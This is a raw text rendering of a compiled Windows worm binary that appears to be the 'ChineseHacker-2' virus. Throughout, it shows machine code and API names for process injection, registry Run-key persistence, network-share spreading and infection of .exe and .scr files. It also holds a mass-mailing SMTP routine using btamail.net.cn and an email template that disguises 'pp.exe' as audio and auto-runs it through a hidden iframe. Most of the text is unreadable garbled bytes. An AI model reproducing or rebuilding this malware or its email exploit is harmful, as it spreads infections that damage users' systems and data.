`èæ  ‹t$ è   ahŸ.B ÃéYè
  �æ ðÿÿ�î   f�>MZuó·~<þ‹oxî‹] Þ3À‹ÖƒÃ@‹;úè   GetProcAddress ^3ɱüó¦uÚ‹ò‹]$Þ·C‹]Þ‹‹Þ�ìü   ‹ü‰´$à   è^  ‹éVÿÓü«‹Íâõ‹$è   USER32.DLL ÿЋðèË  ‹éVÿÓü«‹Íâõ‹$è
   ADVAPI32.DLL ÿЋðè  ‹éVÿÓü«‹Íâõ‹$è   MPR.DLL ÿЋðè\  ‹éVÿÓü«‹Íâõ‹$è   WSOCK32.DLL ÿЋðè|  ‹éVÿÓü«‹Íâõ‹ôè   ChineseHacker-2 j j ÿVÿVÀtÌéÿVj
PÿVèh
 ‹ôè
   ‹ôh`ê  ÿVDëïéYè•  è%
  �‚
 ‰è
  �B-���‰èa  èú  �B;���‰èv  èô  �‚—   ‰èÛ  �B-���‰è0  èÉ  �B;���‰èE  ‹†è   h`ê  PÿVdƒøÿt\VèJ   ^è;   Net Send * My god! Some one killed ChineseHacker-2 Monitor Xj PÿVëœYèÉ  èZ
 éè    _‹†Œ   ‰‡ý  ‹†”   ‰‡  ‹†˜   ‰‡&  ‹FD‰‡f  �‡¼  PTj PPj j ÿVt‹ØX‹†è   h`ê  PÿVdPj SÿVxXƒøÿtÌéVè   ^ëÙYèM  èÞ   éYèA  �ì
 Tèì  ‹üjWÿVpƒøÿt‹Øè…  j j SÿV<Sèc  ‹üjWÿV(PTè.   SOFTWARE\Microsoft\Windows\CurrentVersion\Run h  €ÿ–    [‹Äè   Runonce Yh
 Pj
j QSÿ–¤   è    _‹†¨   ‰‡„  ‹†¤   ‰‡®  ‹†¬   ‰‡™  �‡]  PTj SPj j ÿVtX3À‰†è   �ì
 Tè
  è    _‹FP‰‡{  ‹Fd‰‡—  ‹F‰‡²  ‹FHÀtoj
j ÿЋ–à   ·Z<Ú‹‹
 ‹kT+Í�ù   rHê�—r  jN����URèd  �MN���‹Ôh
 QRèP  ÿVLPTj PUj j ÿV\‰†è   Xhô
 ÿVDÌéj j ÿ–Œ   PTPÿ–ˆ   j hÿ ÿVPÀto‹Øj@h   h   j SÿVhÀtK‹è�—r  PTjN����RUSÿVTXƒøN���u,‹Ô�MN���PTh
 RQSÿVTÿVLTj PUj j SÿVX‰†è   XSÿV`hô
 ÿVDÌéX‹Ìè   GetSystemTime è   GetComputerNameA è   WideCharToMultiByte è   TerminateThread è
   CreateThread è   _lcreat è   GetSystemDirectoryA è   VirtualAllocEx è   WaitForSingleObject è   CloseHandle è   CreateKernelThread è   CreateRemoteThread è   WriteProcessMemory è   OpenProcess è   GetCurrentProcessId è   RegisterServiceProcess è   Sleep è   _lclose è   _llseek è   _lwrite è   _lread è   _lopen è   SetFileTime è   SetFileAttributesA è
   FindClose è   FindNextFileA è   FindFirstFileA è   SetCurrentDirectoryA è   GetDriveTypeA è   WinExec è   GetCommandLineA è
   GetLastError è
   CreateMutexA è
   LoadLibraryA +ÌÁéÿàéX‹Ìè
   wsprintfA è
   SendMessageA è
   GetWindow è   MessageBoxA è   FindWindowA è   GetWindowThreadProcessId +ÌÁéÿàéX‹Ìè   RegNotifyChangeKeyValue è   RegQueryValueExA è   RegSetValueExA è   RegOpenKeyA +ÌÁéÿàéX‹Ìè   WNetCloseEnum è   WNetEnumResourceA è   WNetOpenEnumA +ÌÁéÿàéX‹Ìè   recv è   closesocket è   socket è   connect è   gethostbyname è   htons è   send è   WSACleanup è   WSAStartup +ÌÁéÿàéX‹Ìè   ǹ±ÐÀîºéÖ¾! è   È¥ËûèµÄ·¨Ö¹¦! è   ·´¶Ôа½Ì,³çÉпÆѧ! è   ´òµ¹±¾À­µÇ! è   ÏòÓ¢ÐÛÍõΰÖÒâ! è   ·´¶Ô°ÔȨÖ÷Òå! è   ÊÀ½çÐèÒªºÍƽ! è   Éç»áÖ÷ÒåºÃ! +ÌÿàéÈ   `‹}h
 WÿVløè
   \runouce.exe ^¹   üó¤aÉ é¹   ºC:\ QRTÿVƒørƒøtTè¨   ZBYâåÃé3ÿè8   è)   è   è   ‹GPè‚   ÃéWj
è    ÃéWjè   ÃéWjè   ÃéWjè   ÃéÈ   `PTÿuÿuj
jÿ–°   [Àu6�ì   ‹Ôj
‹Äh   TRPSÿ–´   YYÀu‹üÿUëÞéSÿ–¸   �Ä   aÉ éÈ   `‹E‹
    =winntv=windtoÿuÿVÀteÿuèc   �ì   Ç$*.* ‹ÄTPÿV‹Øƒøÿt1TSÿV Àt$�T$,‹$ƒàt‹<.tåRè•ÿÿÿëÝéTè@   ëÔéSÿV$Ç$..  TÿV�Ä   aÉ éÈ   `è   aÉ éYè¥
  è)   ÿuÿÌéÈ   `è   aÉ éYèƒ
  è   ÿuÿÌéè   ça ZÃéè   äa ZÃéÈ   ‹E@€8 uú‹@ü
    É éÈ   j
ÿVDÉ éÈ   �ì
 TèÞýÿÿ‹üj WÿV0ƒøÿt@‹Ø¸
 P‹ÄPWÿ–€   XÇÇ .emlÇ@    j WÿVpƒøÿt‹øWSj è•  WÿV@SÿV@�Ä
 É éÈ   ‹}�_,Sè`ÿÿÿ=.wabt!=.adct%=r.dbt=.doct=.xlstÉ éSè½  É éSè  �ì
 Tÿ–„   f‹D$�Ä
 f=
ujSÿV0ƒøÿt‹Øh4  TSÿV8SÿV@É éÈ   ‹}�_,SèÙþÿÿ=.exetS=.scrtL=.htmt=htmltÉ j SÿV(jSÿV0ƒøÿt‹ØSè\   �G�O�WRQPSÿV,SÿV@�_,ÿ7SÿV(É j SÿV(jSÿV0ƒøÿt‹ØSè
 �G�O�WRQPSÿV,SÿV@�_,ÿ7SÿV(É éÈ   `�ì
 TèIüÿÿ‹Äj PÿV0�Ä
 ƒøÿ„Å   ‹Øè   readme.eml Xj PÿVpƒøÿ„Ÿ   ‹øWSj è
  WÿV@‹}jj WÿV<èx  
<html><script language="javascript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> XjxPWÿV8SÿV@aÉ éÈ   `�ì   ‹üh   WÿuÿV4·G<ø;ý‡Ô   f�?PE…É   �Ÿø   ·OIƒÃ(âû;݇±   ‹G(+Cr#Cj PÿuÿV<P‹ÄjPÿuÿV4Xf=`脆   �K$   àjj ÿuÿV<ƒøÿtpPü  +C‰C‹S;Âr‰C‹O8IÁÑ÷Ñ#Á#Ñ+
GPY+KK‡O(O4è    _�ï#  ‰ƒïhü  WÿuÿV8ƒøÿtj j ÿuÿV<‹Äh   PÿuÿV8�Ä   aÉ éÈ   `�ì
 TèOúÿÿ‹üj WÿV0ƒøÿt‹ØSÿuè×
 SÿV@�Ä
 aÉ È   `j ÿuÿV0ƒøÿ„‚   ‹Ø�ì
 ‹ü3ÒRP‹Äj
PSÿV4YZÀt[‹ÄƒÀ ;øwâ€ù@tE€ù.t<€ù0r€ù9r8€ùAr€ù~r.3Àüª€þ
u»€ú
r¶+üƒÿr¯Š$<@t¨<.t¤TèHÿÿÿëœþëþÆŠÁüªë”SÿV@�Ä
 aÉ È   `j ÿuÿV0ƒøÿtp‹Ø�ì
 ‹üh
 WSÿV4=
 uK‹G`j PSÿV<‹Od�ù   w6QjDWSÿV4�ì
 ‹Äj j h
 PjÿWh   j ÿV|Tè¼þÿÿ�Ä
 YâÊ�Ä
 SÿV@aÉ È  `‰eü�ì   ‹üÿuWè
  PWÿuÿV8�ì   ‰$�ì   ‰$�ì   ‰$‹üh 0  WÿuÿV4ƒøÿtH‹Ô�ì   ‰$�ì   ‰$�ì   ‰$�ì   ‰$‹üWPRè  PWÿuÿV8Ç$

jWÿuÿV8‹eüa¸
  É È  `‰eüÇEø    �ì   ‹üTh

 ÿ–¼   À…I
 j j
jÿ–Ô   ƒøÿ„.
 ‹ØfÇ jÿ–È   f‰Gè   btamail.net.cn ÿ–Ì   À„ò   ‹@‹ ‰GjWSÿ–Ð   ƒøÿ„×   ÿuWèæ   j PWSÿ–Ä   h   ÿVD�ì   ‰$�ì   ‰$�ì   ‰$‹üh 0  WÿuÿV4ƒøÿ„‰   �ì   ‰$�ì   ‰$�ì   ‰$�ì   ‰$‹ÔRPWèÕ  ‹üj PWSÿ–Ä   h   ÿVDè  
.
Xj jPSÿ–Ä   h   ÿVDè   QUIT
Xj jPSÿ–Ä   h   ÿVDÇEø
  Sÿ–Ø   ÿ–À   ‹eüa‹EøÉ È  `¸
 +à‹ÔPTRÿ–€   Xè  HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
DATA
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID

 X‹üWÿuWÿuPÿuÿ–œ   ‹ç‰Eü�Ä
 a‹EüÉ È  `ÇEü    èA   ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ^‹}‹UÁâ3Û3À¹   ÑàSÿuè0   Jt
CâïŠüªÿEüëÞIÓàŠüªÿEüÑé
Mü°=üóª2Àªa‹EüÉ È   QRV‹u‹M‹ÑÁêŠöÑ€áÒê€â

^ZYÉ XQè   ë:édgÿ6  dg‰&  è   ÿ2‰"ÿàéXè   ‹"�dg�  YYÿàéè   „Í( ZÃéÈ   è   èÑÿÿÿÿáéY‹E‰ˆ¸   3ÀÉ èg
 MZP
 

ÿÿ ¸ @
 "
º
´ Í!¸
LÍ!��This program must be run under Win32
$7 ˆPE L

µ,ï‚ à
Ž�

      @   


 P         0 N @  SCODE       `DATA      @ À.idata  0  
 @ À.reloc  @   @ P ÿ ÿ ÿ kÃÿ%00@ ÿ ÿ ÿ ý(0
80 00 F0 F0 KERNEL32.dll Sleep ÿ µ  0 ÿ ÿ ÿ ù  _ŠG
Àt
P‹Äj
PSÿV8Xëì¶GãQP‹Äj
PSÿV8XYâñëÕÃéÈ   �ì
 3ö‹üf¸
¹   üóf«èöðÿÿ‹´áŠBüª
Àu÷è   ·¢ËÍÏûÏ¢ è   ó�HwXj ÿÀtW‹Øè   €'IwXjSÿÀtB‹Øè   `­Hw_�ì   Th   j
Sÿ�Ä   ÀuTh   jSÿFƒæu
�Ä
 É è   FºYwXhô
 ÿéQÿÿÿéÈ   ‹]�ì
 ‹üè   Runonce ^h
 è   #H(vXTWj j VSÿXè   Ãà'vXj j jj Sÿè   ã(vXh
 Wj
j VSÿëÑéÈ   è   V�vXÿuj hÿ ÿÀt,‹Øè   6�vXjÿSÿè    YƒÁ���è   )2¥vXj
QÿÉ éÈ   `P
L$þXƒÀ‹‹Pè   `‰‰Püó¤aÏúf� f�@‹u‹}‹MÌûaÉ éÈ   `‹Ej PPj ÿ–�   aÉ         à